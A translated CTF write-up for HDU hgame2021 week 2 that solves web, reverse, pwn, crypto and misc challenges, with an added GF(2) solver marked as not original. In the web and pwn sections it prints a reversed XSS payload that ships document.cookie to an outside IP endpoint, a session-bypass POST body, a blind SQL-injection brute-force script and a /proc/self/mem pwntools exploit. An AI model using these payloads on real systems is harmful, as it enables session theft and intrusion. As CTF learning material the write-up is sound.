[Original] HDU hgame2021 week2 writeup
2021-5-27 14:06
HDU hgame2021 week2
web

LazyDogR4U
www.zip gives you the source; just analyse the PHP. The POST body that gets the flag:

```
submit=getflag&_SESSESSIONSION[username]=admin
```
Post to zuckonit
XSS. Write a script to brute-force the md5, and set up an endpoint on a server to receive the cookie.
The XSS payload (written reversed, exactly as submitted):

```
>;eikooc.tnemucod+'=eikooc?php.xedni/271.621.232.94//'=onitacol.tnemucod=rorreno x=crs gmi<
```
200OK!!
Blind SQL injection. The result is reflected through the Status field, so brute-force the answer one character at a time; select / from / where need a case bypass.

```python
import requests
import string

s = requests.session()
url = 'https://200ok.liki.link/server.php'
ans = ''
charset = string.ascii_letters + string.digits + string.punctuation

for i in range(1, 60):          # position in the target string
    print(i)
    for j in charset:           # candidate character for this position
        # payload: the per-position / per-character probe; it is not included in the original post
        hd = {'Status': payload}
        ra = s.get(url=url, headers=hd).text
        if 'HTTP 200 OK' in ra:  # the guess was correct
            print(j)
            ans += j
            print(ans)
            break
```
liki's birthday present
Race condition. Capture a request that buys one item, then resend it repeatedly from multiple threads.
RE

ezAPK
A standard AES-CBC encryption. The ciphertext and key are in the strings file extracted from the APK, the md5 of the key is used as the IV, and an online site can decrypt it.
helloRe2
The first password is fairly simple: just extract the string it is compared against.
For the second password there is an operation that creates a child process. We can start the program first, enter the first password, and then attach while it is waiting for password2 to be entered, which bypasses it.
password2 is then an AES-CBC encryption done through the Windows API; debug to get the key and IV, and an online site can decrypt it.
fake_debugger beta
Connect with nc; from the output it is just a XOR, so recover the flag one character at a time.
pwn

```python
# exploit for the_shop_of_cosmos: read /proc/self/maps to get the ELF base, then patch via /proc/self/mem
from pwn import *

context.arch = "amd64"
context.log_level = 'debug'
sh = remote('159.75.104.107', 30398)

sh.recvuntil('>> ')
sh.sendline('2')
sh.recvuntil('>> ')
sh.sendline('1')
sh.recvuntil('>>')
payload = '/proc/self/maps'
sh.sendline(payload)
r = sh.recvuntil(">> ").splitlines()
print(r)

# find the first readable mapping of the shop binary; its start address is the ELF base
find = ''
for i in r:
    if b'shop' in i and b'r--p' in i:
        find = i
        break
print(find)
elfbase = int(find[25:37], 16)
print(hex(elfbase))

sh.sendline('3')
sh.recvuntil('>> ')
sh.sendline('111111111111111111111111111')
sh.recvuntil('>> ')
sh.sendline('3')
sh.recvuntil('>> ')
sh.sendline('1')
sh.recvuntil('>> ')
sh.sendline('/proc/self/mem')
sh.recv()
# offset into /proc/self/mem relative to the ELF base
sh.send(str(elfbase + 8963))
sh.recv()
sh.interactive()
```
the_shop_of_cosmos involves knowledge of /proc/self/maps and /proc/self/mem: maps outputs the load base address of the current file, and mem can then be used to modify memory relative to that base.
There is also a vulnerability when entering the purchase quantity: if the number you enter is large enough, not only is no money deducted, you actually get money added.
I won't post the exp; it's fairly simple.
Crypto

signin
Involves modular inverses and Fermat's little theorem.

```python
import gmpy2 as gp

a = 120564833131633739158549093373383030645182202806635769940195284023469961424430923715818093121085879348486463281230726872340657095109768577902440918006603617292966510139101925420092009141992297880055417691248727683982726247023493718983115997089469688231746849686247739418658852264067119018204494137801699628029
p = 148140300958875725110463571601905200234821194378794516477263427461757925343914688226737140798026085300393433907134398619032741580554160606218907137988428324426186509706800792611343514541678289427961521540035354172625978137607303224840667034663267838925533542620638127405243015959966081896809444573527022309249
c = 68440055982359010847898371404412732634348351726170164279294474616113724074780415334776297201043620092127606983656166275101316284528506702011968422243891906577121609117923786504777856703297008749336097935284178407297998562145215797433785929150838433234255425306556109520390062565249629009857440054617892617632

ina = gp.invert(a, p)      # modular inverse of a mod p
m = c * ina % p            # undo the multiplication by a
print(bytes.fromhex(hex(m)[2:]))
```
gcd or more?
Basic RSA.
WhitegiveRSA
Giveaway RSA.
The Password
This challenge amounts to solving a system of 64 XOR equations in 64 unknowns. It can be solved with linear algebra; here I used z3.

```python
from z3 import *

solver = Solver()
# one unknown per bit; 1-bit variables (the original used 8-bit BitVecs, which let z3 pick values other than 0/1)
flag = [BitVec('flag%d' % i, 1) for i in range(64)]
rflag = [0 for i in range(64)]
lflag = [0 for i in range(64)]

# rflag[i] is the bit 8 positions further on (rotating), lflag[i] the bit 16 positions further on
for i in range(64):
    if (i < 56):
        rflag[i] = flag[i + 8]
    else:
        rflag[i] = flag[i - 56]
for i in range(64):
    if (i < 48):
        lflag[i] = flag[16 + i]
    else:
        lflag[i] = flag[i - 48]

value = 8020289479524135048 ^ 4092084344173014
value = '{:064b}'.format(value)
# value[63 - i] is bit i (rightmost bit first)
for i in range(64):
    solver.add(flag[i] ^ rflag[i] ^ lflag[i] == int(value[63 - i], 2))

if solver.check() == sat:
    model = solver.model()
    for i in range(64):
        print(model[flag[i]].as_long().real, end='')
else:
    print("unsat")
```
Because I treated the rightmost bit as the first one, the output has to be reversed and then converted to hex; every two hex digits is one character. Plug the seven groups of data into the script and concatenate the results to get the flag.
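As an added example (not part of the original writeup), the same system solved without z3 by Gauss-Jordan elimination over GF(2), using the writeup's two constants. The equations are exactly the ones the rflag/lflag loops encode: bit i XOR bit (i+8) mod 64 XOR bit (i+16) mod 64 equals bit i of the value, with the rightmost bit as bit 0.

```python
# Added example, not from the original writeup: solve the 64-unknown XOR system over GF(2).
N = 64
VALUE = 8020289479524135048 ^ 4092084344173014  # the two constants from the writeup

def build_rows(value, n=N):
    """Augmented system as one int per row: bits 0..n-1 are the coefficients,
    bit n is the right-hand side (bit i of value)."""
    rows = []
    for i in range(n):
        coeffs = (1 << i) | (1 << ((i + 8) % n)) | (1 << ((i + 16) % n))
        rhs = (value >> i) & 1          # rightmost bit of value is equation 0
        rows.append(coeffs | (rhs << n))
    return rows

def solve_gf2(rows, n=N):
    """Gauss-Jordan elimination over GF(2). Returns the solution bits x[0..n-1],
    or None if some column has no pivot (singular system)."""
    rows = list(rows)
    pivot_row = 0
    for col in range(n):
        piv = next((r for r in range(pivot_row, len(rows)) if rows[r] >> col & 1), None)
        if piv is None:
            return None
        rows[pivot_row], rows[piv] = rows[piv], rows[pivot_row]
        for r in range(len(rows)):      # clear column col from every other row
            if r != pivot_row and rows[r] >> col & 1:
                rows[r] ^= rows[pivot_row]
        pivot_row += 1
    # fully reduced: row col is (1 << col) | (x[col] << n)
    return [(rows[col] >> n) & 1 for col in range(n)]

def check(bits, value, n=N):
    """Plug the solution back into all 64 equations."""
    return all((bits[i] ^ bits[(i + 8) % n] ^ bits[(i + 16) % n]) == ((value >> i) & 1)
               for i in range(n))

def bits_to_hex(bits):
    """Assemble x[63..0] into an integer and print it as hex (two hex digits per byte),
    which is the reversed-then-hex step described above."""
    return hex(sum(b << i for i, b in enumerate(bits)))

if __name__ == "__main__":
    sol = solve_gf2(build_rows(VALUE))
    print(sol, check(sol, VALUE), bits_to_hex(sol))
```

The system is full rank (the rotation polynomial 1 + x^8 + x^16 is coprime to x^64 + 1 over GF(2)), so the solution is unique and check() must return True.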
misc

Tools
This challenge teaches various steganography tools: the name of each archive tells you which tool to use, so just unpack the nested layers one by one.
Telegraph:1601 6639 3459 3134 0892
Audio steganography.
There is a section of Morse code in the middle: long tones are _ and short tones are .
Decoding it gives the flag.
Hallucigenia
StegSolve gives a QR code; scanning it yields a base64 string. Decode it, reverse it, convert it back to an image, and finally flip the image to get the flag.
DNS
Traffic analysis. Open the capture in Wireshark and you can see the site flag.hgame2021.cf. Visit it, and F12 shows the hint SPF.

```
nslookup -type=txt flag.hgame2021.cf
```

That gives the flag.
Last edited 2021-6-15 20:00 by 77pray